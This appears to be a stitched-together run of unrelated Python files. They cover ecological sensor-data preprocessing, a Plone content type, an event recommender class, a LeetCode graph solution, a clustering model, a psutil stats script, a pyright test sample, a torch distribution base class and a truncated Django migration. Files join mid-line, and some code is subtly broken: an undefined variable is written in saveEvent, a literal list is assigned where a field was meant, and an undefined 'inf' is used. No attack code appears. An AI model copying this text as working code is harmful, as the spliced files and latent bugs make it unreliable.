lc_sensor_flist = glob.glob( sensor_dir + '/sm_cop/*.cop') # leaf chamber sensors sc_sensor_flist = glob.glob( sensor_dir + '/sm_mpr/*.mpr') # soil chamber sensors # local time is UTC+2 doy_today = (datetime.datetime.utcnow() - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. + 2. / 24. if preproc_config.run_options['process_recent_period']: doy_start = np.int(doy_today - preproc_config.run_options['traceback_in_days']) doy_end = np.int(np.ceil(doy_today)) else: doy_start = 97 # campaign starts on 7 Apr 2016 doy_end = 315 # campaign ends on 10 Nov 2016 (plus one for `range()`) year_start = 2016 # starting year for converting day of year values # data fields in the leaf chamber sensor data file (*.cop) # correspondence between chamber number and sensor number was changing # throughout the campaign. refer to the metadata table for the information. 
# 0 - time; 1 - PAR_ch_1; 2 - PAR_ch_2; # 8 - ambient T; 10 - T_ch_1; # 11 - T_ch_2; 12 - T_ch_3; # data fields in the soil chamber sensor data file (*.mpr) # 0 - time; 5 - soil chamber 1 (T_ch_4); 6 - soil chamber 2 (T_ch_5) # 7 - soil chamber 3 (T_ch_6) for doy in range(doy_start, doy_end): run_date_str = (datetime.datetime(2016, 1, 1) + datetime.timedelta(doy + 0.5)).strftime('%y%m%d') current_lc_sensor_files = [s for s in lc_sensor_flist if run_date_str in s] current_sc_sensor_files = [s for s in sc_sensor_flist if run_date_str in s] # reading leaf chamber sensor data df_lc_sensor = None if len(current_lc_sensor_files) > 0: for entry in current_lc_sensor_files: df_lc_sensor_loaded = pd.read_csv( entry, sep='\\s+', usecols=[0, 1, 2, 8, 10, 11, 12], names=['datetime', 'PAR_ch_1', 'PAR_ch_2', 'T_amb', 'T_ch_1', 'T_ch_2', 'T_ch_3'], dtype={'datetime': str, 'PAR_ch_1': np.float64, 'PAR_ch_2': np.float64, 'T_amb': np.float64, 'T_ch_1': np.float64, 'T_ch_2': np.float64, 'T_ch_3': np.float64}, parse_dates={'timestamp': [0]}, date_parser=lambda s: np.datetime64( '%s-%s-%s %s:%s:%s' % (s[0:4], s[4:6], s[6:8], s[8:10], s[10:12], s[12:14])), engine='c', na_values='-') if df_lc_sensor is None: df_lc_sensor = df_lc_sensor_loaded else: df_lc_sensor = pd.concat([df_lc_sensor, df_lc_sensor_loaded], ignore_index=True) del df_lc_sensor_loaded else: print('Leaf chamber sensor data file not found on day 20%s' % run_date_str) continue # reading soil chamber sensor data df_sc_sensor = None if len(current_sc_sensor_files) > 0: for entry in current_sc_sensor_files: df_sc_sensor_loaded = pd.read_csv( entry, sep='\\s+', usecols=[0, 5, 6, 7], names=['datetime', 'T_ch_4', 'T_ch_5', 'T_ch_6'], dtype={'datetime': str, 'T_ch_4': np.float64, 'T_ch_5': np.float64, 'T_ch_6': np.float64}, parse_dates={'timestamp': [0]}, date_parser=lambda s: np.datetime64( '%s-%s-%s %s:%s:%s' % (s[0:4], s[4:6], s[6:8], s[8:10], s[10:12], s[12:14])), engine='c') if df_sc_sensor is None: df_sc_sensor = df_sc_sensor_loaded else: df_sc_sensor = pd.concat([df_sc_sensor, df_sc_sensor_loaded], ignore_index=True) del df_sc_sensor_loaded else: print('Soil chamber sensor data file not found on day 20%s' % run_date_str) continue # convert day of year number doy_lc_sensor = \ (df_lc_sensor['timestamp'] - pd.Timestamp('%s-01-01' % year_start)) / \ pd.Timedelta(days=1) # parse datetime strings # doy_lc_sensor = np.zeros(df_lc_sensor.shape[0]) * np.nan # for i in range(df_lc_sensor.shape[0]): # dt_str = df_lc_sensor.loc[i, 'datetime'] # if len(dt_str) == 14: # # accelerate datetime parsing with manual operations # dt_converted = datetime.datetime( # int(dt_str[0:4]), int(dt_str[4:6]), int(dt_str[6:8]), # int(dt_str[8:10]), int(dt_str[10:12]), int(dt_str[12:14])) # doy_lc_sensor[i] = \ # (dt_converted - # datetime.datetime(2016, 1, 1)).total_seconds() / 86400. # # doy_lc_sensor[i] = ( # # datetime.datetime.strptime(dt_str, '%Y%m%d%H%M%S') - # # datetime.datetime(2016, 1, 1)).total_seconds() / 86400. # else: # doy_lc_sensor[i] = np.nan # indices for insertion, range 0 to 17279 ind_lc_sensor = (doy_lc_sensor - doy) * 86400. / 5. 
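A toy check of the index arithmetic just performed (values are illustrative): with 86400 seconds per day and one slot every 5 seconds there are 17280 slots, so a reading stamped at 12:00 on day `doy` should land in slot 8640.

import numpy as np

doy = 158                              # example day of year
doy_sample = doy + 0.5                 # a reading taken exactly at midday
idx = int(np.round((doy_sample - doy) * 86400. / 5.))
assert idx == 8640                     # half of the 17280 five-second slots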
ind_lc_sensor = np.round(ind_lc_sensor).astype(np.int64) # convert day of year number doy_sc_sensor = \ (df_sc_sensor['timestamp'] - pd.Timestamp('%s-01-01' % year_start)) / \ pd.Timedelta(days=1) # doy_sc_sensor = np.zeros(df_sc_sensor.shape[0]) * np.nan # for i in range(df_sc_sensor.shape[0]): # dt_str = df_sc_sensor.loc[i, 'datetime'] # if len(dt_str) == 14: # # accelerate datetime parsing with manual operations # dt_converted = datetime.datetime( # int(dt_str[0:4]), int(dt_str[4:6]), int(dt_str[6:8]), # int(dt_str[8:10]), int(dt_str[10:12]), int(dt_str[12:14])) # doy_sc_sensor[i] = \ # (dt_converted - # datetime.datetime(2016, 1, 1)).total_seconds() / 86400. # # doy_sc_sensor[i] = ( # # datetime.datetime.strptime(dt_str, '%Y%m%d%H%M%S') - # # datetime.datetime(2016, 1, 1)).total_seconds() / 86400. # else: # doy_sc_sensor[i] = np.nan # indices for insertion, range 0 to 17279 ind_sc_sensor = (doy_sc_sensor - doy) * 86400. / 5. ind_sc_sensor = np.round(ind_sc_sensor).astype(np.int64) # corrections for PAR and TC values # parameters from <>, 13 April 2016 # correction factor for 'PAR_ch_2' was updated 27 October 2016, # according to <> df_lc_sensor['PAR_ch_1'] *= 200. # was 210-220 df_lc_sensor['PAR_ch_2'] *= 205. # was 200 df_lc_sensor['T_ch_1'] = df_lc_sensor['T_ch_1'] * 0.94 + 0.75 df_lc_sensor['T_ch_2'] = df_lc_sensor['T_ch_2'] * 0.96 - 0.20 if doy < 103: # before 13 April 2016, but not including that day df_lc_sensor['T_ch_3'] = df_lc_sensor['T_ch_3'] * 0.98 - 0.89 else: # TC in the large leaf chamber reinstalled 13 April 2016 11:20 am # before that, temperature data were corrupt at this channel df_lc_sensor['T_ch_3'] = df_lc_sensor['T_ch_3'] * 0.97 - 0.39 # mask corrupt data # 1. 'T_ch_3' data between April 8 and 13 of 2016 were corrupt if doy == 98: break_pt = (datetime.datetime(2016, 4, 8, 9, 33, 41) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[doy_lc_sensor > break_pt, 'T_ch_3'] = np.nan del break_pt elif 98 < doy < 103: df_lc_sensor['T_ch_3'] = np.nan elif doy == 103: break_pt = (datetime.datetime(2016, 4, 13, 11, 20, 24) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[doy_lc_sensor < break_pt, 'T_ch_3'] = np.nan del break_pt # 2. no soil chamber sensors before 12 April 2016 10:37:09 am if doy < 102: df_sc_sensor[['T_ch_4', 'T_ch_5', 'T_ch_6']] = np.nan elif doy == 102: break_pt = (datetime.datetime(2016, 4, 12, 10, 37, 9) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_sc_sensor.loc[doy_sc_sensor < break_pt, ['T_ch_4', 'T_ch_5', 'T_ch_6']] = np.nan del break_pt # 3. remove 'PAR_ch_2' data before before 8 April 2016 09:40:25 am if doy == 97: df_lc_sensor['PAR_ch_2'] = np.nan elif doy == 98: break_pt = (datetime.datetime(2016, 4, 8, 9, 40, 25) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[doy_lc_sensor < break_pt, 'PAR_ch_2'] = np.nan del break_pt # 4. 'PAR_ch_2' data from 08:40 to 09:41 on 7 June 2016 were corrupt if doy == 158: break_pt1 = (datetime.datetime(2016, 6, 7, 8, 40) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. break_pt2 = (datetime.datetime(2016, 6, 7, 9, 41) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[ (doy_lc_sensor > break_pt1) & (doy_lc_sensor < break_pt2) & (df_lc_sensor['PAR_ch_1'].values < 400.), 'PAR_ch_1'] = np.nan df_lc_sensor.loc[ (doy_lc_sensor > break_pt1) & (doy_lc_sensor < break_pt2) & (df_lc_sensor['PAR_ch_2'].values < 400.), 'PAR_ch_2'] = np.nan del break_pt1, break_pt2 # 5. 
power failure for leaf chamber sensor logger # no data from 30 Aug 2016 13:44:36 to 5 Sep 2016 11:22:44 if doy == 242: break_pt = (datetime.datetime(2016, 8, 30, 13, 44, 36) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[doy_lc_sensor > break_pt, 1:] = np.nan if 242 < doy < 248: df_lc_sensor.loc[:, 1:] = np.nan if doy == 248: break_pt = (datetime.datetime(2016, 9, 5, 11, 22, 44) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[doy_lc_sensor < break_pt, 1:] = np.nan # 6. thermocouple at channel 11 (T_ch_2) was fallen during # 29 Aug 2016 09:00 to 12 Sep 2016 11:00 if 241 <= doy < 255: df_lc_sensor['T_ch_2'] = np.nan elif doy == 255: break_pt = (datetime.datetime(2016, 9, 12, 11, 0, 0) - datetime.datetime(2016, 1, 1)).total_seconds() / 86400. df_lc_sensor.loc[doy_lc_sensor < break_pt, 'T_ch_2'] = np.nan # 7. Bad PAR measurements from 10:30 to 11:00 on 5 Oct 2016 (?) # no action, since no abnormal measurements were detected in this period # 8. allow -5 as the lower limit of PAR (tolerance for random errors) df_lc_sensor.loc[df_lc_sensor['PAR_ch_1'] < -5., 'PAR_ch_1'] = np.nan df_lc_sensor.loc[df_lc_sensor['PAR_ch_2'] < -5., 'PAR_ch_2'] = np.nan # 9. identify corrupt thermocouple measurements using IQR criteria for col in ['T_amb', 'T_ch_1', 'T_ch_2', 'T_ch_3']: if np.sum(np.isfinite(df_lc_sensor[col].values)) > 0: TC_lolim, TC_uplim = IQR_bounds_func(df_lc_sensor[col].values) df_lc_sensor.loc[(df_lc_sensor[col] < TC_lolim) | (df_lc_sensor[col] > TC_uplim), col] = np.nan for col in ['T_ch_4', 'T_ch_5', 'T_ch_6']: if np.sum(np.isfinite(df_sc_sensor[col].values)) > 0: TC_lolim, TC_uplim = IQR_bounds_func(df_sc_sensor[col].values) df_sc_sensor.loc[(df_sc_sensor[col] < TC_lolim) | (df_sc_sensor[col] > TC_uplim), col] = np.nan df_all_sensor = pd.DataFrame( columns=['doy', 'PAR_ch_1', 'PAR_ch_2', 'T_amb', 'T_ch_1', 'T_ch_2', 'T_ch_3', 'T_ch_4', 'T_ch_5', 'T_ch_6'], dtype=np.float64) df_all_sensor['doy'] = doy + np.arange(0, 86400, 5) / 86400. for col in df_lc_sensor.columns.values[1:]: df_all_sensor.loc[ind_lc_sensor, col] = df_lc_sensor[col] for col in df_sc_sensor.columns.values[1:]: df_all_sensor.loc[ind_sc_sensor, col] = df_sc_sensor[col] # for i in range(df_all_sensor.shape[0]): # loc_lc_sensor = np.where( # np.abs(doy_lc_sensor - df_all_sensor.loc[i, 'doy']) < 1e-5)[0] # loc_sc_sensor = np.where( # np.abs(doy_sc_sensor - df_all_sensor.loc[i, 'doy']) < 1e-5)[0] # if loc_lc_sensor.size > 0: # for col in df_lc_sensor.columns.values[1:]: # df_all_sensor.set_value( # i, col, df_lc_sensor.loc[loc_lc_sensor[0], col]) # if loc_sc_sensor.size > 0: # for col in df_sc_sensor.columns.values[1:]: # df_all_sensor.set_value( # i, col, df_sc_sensor.loc[loc_sc_sensor[0], col]) # '%.2f' is the accuracy of the raw data; round the sensor data df_all_sensor = df_all_sensor.round({ 'doy': 14, 'PAR_ch_1': 2, 'PAR_ch_2': 2, 'T_amb': 2, 'T_ch_1': 2, 'T_ch_2': 2, 'T_ch_3': 2, 'T_ch_4': 2, 'T_ch_5': 2, 'T_ch_6': 2}) # dump data into csv files; do not output row index output_fname = output_dir + '/hyy16_sensor_data_20%s.csv' % run_date_str df_all_sensor.to_csv(output_fname, sep=',', na_rep='NaN', index=False) # daily plots for diagnosing wrong measurements if preproc_config.run_options['plot_sensor_data']: fig, axes = plt.subplots(3, 1, sharex=True, figsize=(8, 8)) time_in_hour = (df_all_sensor['doy'].values - doy) * 24. for col in ['PAR_ch_1', 'PAR_ch_2']: axes[0].plot(time_in_hour, df_all_sensor[col].values, label=col, lw=1.) 
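As a worked illustration of the IQR-based thermocouple screening applied above (numbers are made up), IQR_bounds_func keeps the normal diurnal spread but rejects isolated spikes thanks to its asymmetric bounds:

import numpy as np

x = np.array([10.1, 10.4, 11.0, 11.6, 12.0, 85.0])       # one obvious spike
q1, q3 = np.nanpercentile(x, [25, 75])                    # ~10.55 and ~11.90
lolim, uplim = q1 - 2 * (q3 - q1), q3 + 5 * (q3 - q1)     # ~7.85 and ~18.65
x_clean = np.where((x < lolim) | (x > uplim), np.nan, x)  # the 85.0 reading becomes NaN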
axes[0].legend(loc='upper left', frameon=False, fontsize=10, ncol=2) for col in ['T_amb', 'T_ch_1', 'T_ch_2', 'T_ch_3']: axes[1].plot(time_in_hour, df_all_sensor[col].values, label=col, lw=1.) axes[1].legend(loc='upper left', frameon=False, fontsize=10, ncol=4) for col in ['T_ch_4', 'T_ch_5', 'T_ch_6']: axes[2].plot(time_in_hour, df_all_sensor[col].values, label=col, lw=1.) axes[2].legend(loc='upper left', frameon=False, fontsize=10, ncol=3) axes[0].set_ylabel('PAR ($\mu$mol m$^{-2}$ s$^{-1}$)') axes[1].set_ylabel('Temperature ($\degree$C)') axes[2].set_ylabel('Temperature ($\degree$C)') axes[2].set_xlim([0, 24]) axes[2].xaxis.set_ticks(range(0, 25, 3)) axes[2].set_xlabel('Hour (UTC+2)') fig.tight_layout() fig.savefig(output_dir + '/plots/hyy16_sensor_data_20%s.png' % run_date_str) fig.clf() del fig, axes if not args.flag_silent_mode: print( '\n%d lines converted from sensor data file(s) on the day 20%s.' % (df_all_sensor.shape[0], run_date_str)) print(df_all_sensor.describe().transpose()) del df_lc_sensor, df_sc_sensor, df_all_sensor # echo program ending dt_end = datetime.datetime.now() print(datetime.datetime.strftime(dt_end, '%Y-%m-%d %X')) print('Done. Finished in %.2f seconds.' % (dt_end - dt_start).total_seconds()) """ Definition of the Story dexterity content type """ from zope.interface import implementer from archive.content.interfaces.story import IStory from plone.dexterity.content import Container @implementer(IStory) class Story(Container): """ Archive Story Item """ from item import Item from time import strftime, gmtime import os import json from conceptmodel import ConceptModel class Event(Item): """ The Event class extends the Item class, and is the container for the events this application is trying to recommend to its users. NOTE: Events that have been manipulated using ConceptModel() have a `maturity` entry associated with their dictionary representation. This piece of information is not yet used for anything, but may prove helpful in the future. 
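For reference, an entry written to events.json by saveEvent() has roughly the following shape; every value below is a placeholder, only the keys are taken from the schema used in this class:

    {
        "events": [
            {
                "name": "Sample Event",
                "model": {"concepts": {}, "maturity": 1},
                "description": "Placeholder description.",
                "starttime": [],
                "endtime": [],
                "location": "",
                "url": "",
                "picture": ""
            }
        ]
    }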
""" starttime = [] endtime = [] location = "" picture = "" url = "" def __init__(self, description="", starttime=[], endtime=[], location="", picture="", name="", url=""): super().__init__(description=description, name=name) self.starttime = starttime self.endtime = endtime self.location = location self.url = url self.picture = picture def loadEvent(self, name, filename="events.json"): if filename not in [f for f in os.listdir('.') if os.path.isfile(f)]: raise IOError("The item definitions file" + filename + " appears to be missing!") list_of_items = json.load(open(filename))['events'] for item in list_of_items: # print(name + '\n' + item['name']) if item['name'] != name: continue else: self.name = name self.description = item['description'] self.model = ConceptModel(model=item['model']['concepts']) self.start_time = item['starttime'] self.end_time = item['endtime'] self.location = item['location'] self.url = item['url'] self.picture = ['picture'] return raise IOError("The item " + name + "was not found!") def saveEvent(self, filename="events.json"): event_schema = { "name": self.name, "model": { "concepts": self.model.model, "maturity": self.model.maturity }, "description": self.description, "starttime": self.starttime, "endtime": self.endtime, "location": self.location, "url": self.url, "picture": self.picture } if filename not in [f for f in os.listdir('.') if os.path.isfile(f)]: new_file_schema = { "events": [event_schema] } f = open(filename, 'w') f.write(json.dumps(content, indent=4)) f.close() else: data = json.load(open(filename)) names = [event['name'] for event in data['events']] if self.name not in names: data['events'].append(event_schema) with open(filename, 'w') as outfile: json.dump(data, outfile, indent=4) if self.name in names: user_index = 0 for i in range(0, len(data['events'])): if data['events'][i]['name'] == self.name: user_index = i break data['events'][user_index] = event_schema with open(filename, 'w') as outfile: json.dump(data, outfile, indent=4) def deleteEvent(self, filename="events.json"): self.deleteItem(filename)class Solution: def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int: graph = defaultdict(list) for source, dest, time in times: graph[source].append((time, dest)) return self.bellmanford(graph, k, n) #return self.djikstra(graph, k, n) def djikstra(self, graph, start_node, total_nodes): max_time = 0 unvisited = [] # priority heap heappush(unvisited, (0, start_node)) costs = [float("inf") for _ in range(total_nodes+1)] costs[start_node] = 0 costs[0] = 0 while unvisited: time, source = heappop(unvisited) if costs[source] < time: # check if already better cost continue max_time = max(max_time, time) for dest_time, dest in graph[source]: cost = time + dest_time if costs[dest] > cost: # relax the edge costs[dest] = cost heappush(unvisited, (cost, dest)) for cost in costs: if cost == float("inf"): return -1 return max_time def bellmanford(self, graph, start_node, total_nodes): """ from: [[cost,to],[cost,to]] """ costs = [float(inf) for _ in range(total_nodes+1)] costs[start_node] = 0 costs[0] = 0 for i in range(1, total_nodes+1): for source in range(1, total_nodes+1): for cost, dest in graph[source]: new_dist = costs[source] + cost # relax the edge costs[dest] = min(costs[dest], new_dist) max_cost = max(costs) return -1 if max_cost == float(inf) else max_cost """ Module entrypoint """ from .translator import cli from . import global_vars """ Copyright (C) 2019-2020 University of Massachusetts Amherst. 
This file is part of “grinch” http://github.com/iesl/grinch Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import numpy as np import torch.nn from absl import logging from grinch.features import must_not_link_rule, must_link_rule class LinearAndRuleModel(torch.nn.Module): """A linear model w/ must and must-not link constraints.""" def __init__(self, init_w, init_b, init_rules, feat2id): super(LinearAndRuleModel, self).__init__() self.lin_weight = torch.nn.Parameter(torch.from_numpy(init_w)) self.bias = torch.nn.Parameter(torch.from_numpy(init_b)) self.rules = torch.from_numpy(init_rules) self.feat2id = feat2id self.aux = dict() def weight_for(self, feature_name): learned, fid = self.feat2id[feature_name] if learned: return self.lin_weight[fid], self.bias[fid] else: return self.rules[fid], None @staticmethod def from_encoding_model(encoding_model, init_w=None, init_b=None, init_rules=None): logging.info('Creating LinearAndRuleModel from encoding model %s ', encoding_model.name) feat2id = dict() next_learned_id = 0 next_rule_id = 0 for feat in encoding_model.feature_list: if feat.name in encoding_model.must_link_rules or feat.name in encoding_model.must_not_link_rules: feat2id[feat.name] = (False, next_rule_id) next_rule_id += 1 else: feat2id[feat.name] = (True, next_learned_id) next_learned_id += 1 if init_w is None: init_w = np.ones(len([k for k in feat2id if feat2id[k][0]]), dtype=np.float32) if init_b is None: init_b = np.ones_like(init_w) * 1e-4 if init_rules is None: init_rules = np.ones(len([k for k in feat2id if not feat2id[k][0]]), dtype=np.float32) for k, (is_learned, idx) in feat2id.items(): if k in encoding_model.must_link_rules: assert not is_learned init_rules[idx] = must_link_rule elif k in encoding_model.must_not_link_rules: assert not is_learned init_rules[idx] = must_not_link_rule else: assert is_learned model = LinearAndRuleModel(init_w, init_b, init_rules, feat2id) return model mottaquikarim/pydev-psets """ Exploratory Data Analysis II - Unique Values """ import numpy as np import pandas as pd wine_reviews = pd.read_csv('raw_data/winemag-data-130k.csv') # Print a list of all the unique countries in the wine_reviews DataFrame in alphabetical order. Also print the number of unique countries that exist in the dataset. Hint: Don't just find the length of your first result. #!/usr/bin/python3 # apt install -y python3-pip && pip3 install psutil import json, psutil res = {} res['cpu_count'] = psutil.cpu_count() res['memory_total'] = int(psutil.virtual_memory().total / 1024 / 1024) res['disk_total'] = int(psutil.disk_usage('/').total / 1024 / 1024 / 1024) res['cpu_percent'] = psutil.cpu_percent(1) res['memory_percent'] = psutil.virtual_memory().percent res['disk_percent'] = psutil.disk_usage('/').percent print(json.dumps(res)) packages/pyright-internal/src/tests/samples/import2.py # This sample tests import resolution for relative imports. from datetime import datetime # This should generate an error because relative imports can # be used only with the "from . import A" form. import .package1 as p0 from . 
import package1 as p1 a = p1.foo() from .package1 import foo b = foo() # This should generate an error because there is no # directory or file named package2. from . import package2 as p2 from .package1.sub import subfoo # subfoo should resolve to the package1/sub/__init__.py, # which returns a datetime. Verify that it does. c: datetime = subfoo() from .package1.psyche import psyche1 # This should resolve to package1/psyche.py even though # there is a package1/psyche directory present. d: int = psyche1() codeproject/DeepStackwindows_packages_gpu/torch/distributions/exp_family.py import torch from torch.distributions.distribution import Distribution class ExponentialFamily(Distribution): r""" ExponentialFamily is the abstract base class for probability distributions belonging to an exponential family, whose probability mass/density function has the form is defined below .. math:: p_{F}(x; \theta) = \exp(\langle t(x), \theta\rangle - F(\theta) + k(x)) where :math:`\theta` denotes the natural parameters, :math:`t(x)` denotes the sufficient statistic, :math:`F(\theta)` is the log normalizer function for a given family and :math:`k(x)` is the carrier measure. Note: This class is an intermediary between the `Distribution` class and distributions which belong to an exponential family mainly to check the correctness of the `.entropy()` and analytic KL divergence methods. We use this class to compute the entropy and KL divergence using the AD framework and Bregman divergences (courtesy of: and , Entropies and Cross-entropies of Exponential Families). """ @property def _natural_params(self): """ Abstract method for natural parameters. Returns a tuple of Tensors based on the distribution """ raise NotImplementedError def _log_normalizer(self, *natural_params): """ Abstract method for log normalizer function. Returns a log normalizer based on the distribution and input """ raise NotImplementedError @property def _mean_carrier_measure(self): """ Abstract method for expected carrier measure, which is required for computing entropy. """ raise NotImplementedError def entropy(self): """ Method to compute the entropy using Bregman divergence of the log normalizer. 
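In symbols, and matching the computation below term by term (a restatement of the code, not new behaviour):

.. math::
    H(p_F) = F(\theta) - \langle \theta, \nabla_\theta F(\theta) \rangle - \mathbb{E}_{p_F}[k(x)]

using :math:`\mathbb{E}_{p_F}[t(x)] = \nabla_\theta F(\theta)`: the method starts from
:math:`-\mathbb{E}[k(x)]` (the mean carrier measure), adds the log normalizer, and
subtracts :math:`\theta \cdot \nabla_\theta F(\theta)` obtained via autograd.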
""" result = -self._mean_carrier_measure nparams = [p.detach().requires_grad_() for p in self._natural_params] lg_normal = self._log_normalizer(*nparams) gradients = torch.autograd.grad(lg_normal.sum(), nparams, create_graph=True) result += lg_normal for np, g in zip(nparams, gradients): result -= np * g return result # encoding: utf-8 import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'Boardfile' db.create_table('boarddocs_boardfile', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('whenUploaded', self.gf('django.db.models.fields.DateTimeField')()), ('thefile', self.gf('django.db.models.fields.files.FileField')(max_length=100)), ('name', self.gf('django.db.models.fields.CharField')(max_length=400, blank=True)), ('covering', self.gf('django.db.models.fields.DateTimeField')()), )) db.send_create_signal('boarddocs', ['Boardfile']) # Adding model 'Annualreport' db.create_table('boarddocs_annualreport', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('whenUploaded', self.gf('django.db.models.fields.DateTimeField')()), ('thefile', self.gf('django.db.models.fields.files.FileField')(max_length=100)), ('name', self.gf('django.db.models.fields.CharField')(max_length=400, blank=True)), ('startDate', self.gf('django.db.models.fields.DateField')()), ('endDate', self.gf('django.db.models.fields.DateField')()), )) db.send_create_signal('boarddocs', ['Annualreport']) # Adding model 'Budgetreport' db.create_table('boarddocs_budgetreport', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('whenUploaded', self.gf('django.db.models.fields.DateTimeField')()), ('thefile', self.gf('django.db.models.fields.files.FileField')(max_length=100)), ('name', self.gf('django.db.models.fields.CharField')(max_length=400, blank=True)), ('startDate', self.gf('django.db.models.fields.DateField')()), ('endDate', self.gf('django.db.models.fields.DateField')()), )) db.send_create_signal('boarddocs', ['Budgetreport']) # Adding model 'Minutes' db.create_table('boarddocs_minutes', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('whenUploaded', self.gf('django.db.models.fields.DateTimeField')()), ('thefile', self.gf('django.db.models.fields.files.FileField')(max_length=100)), ('name', self.gf('django.db.models.fields.CharField')(max_length=400, blank=True)), ('meetingDate', self.gf('django.db.models.fields.DateTimeField')()), )) db.send_create_signal('boarddocs', ['Minutes']) # Adding model 'Agenda' db.create_table('boarddocs_agenda', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('whenUploaded', self.gf('django.db.models.fields.DateTimeField')()), ('thefile', self.gf('django.db.models.fields.files.FileField')(max_length=100)), ('name', self.gf('django.db.models.fields.CharField')(max_length=400, blank=True)), ('meetingDate', self.gf('django.db.models.fields.DateTimeField')()), )) db.send_create_signal('boarddocs', ['Agenda']) # Adding model 
'Historical' db.create_table('boarddocs_historical', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('whenUploaded', self.gf('django.db.models.fields.DateTimeField')()), ('thefile', self.gf('django.db.models.fields.files.FileField')(max_length=100)), ('name', self.gf('django.db.models.fields.CharField')(max_length=400, blank=True)), )) db.send_create_signal('boarddocs', ['Historical']) def backwards(self, orm): # Deleting model 'Boardfile' db.delete_table('boarddocs_boardfile') # Deleting model 'Annualreport' db.delete_table('boarddocs_annualreport') # Deleting model 'Budgetreport' db.delete_table('boarddocs_budgetreport') # Deleting model 'Minutes' db.delete_table('boarddocs_minutes') # Deleting model 'Agenda' db.delete_table('boarddocs_agenda') # Deleting model 'Historical' db.delete_table('boarddocs_historical') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'boarddocs.agenda': { 'Meta': {'object_name': 'Agenda'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'meetingDate': ('django.db.models.fields.DateTimeField', [], {}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}), 'thefile': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}), 'user': 
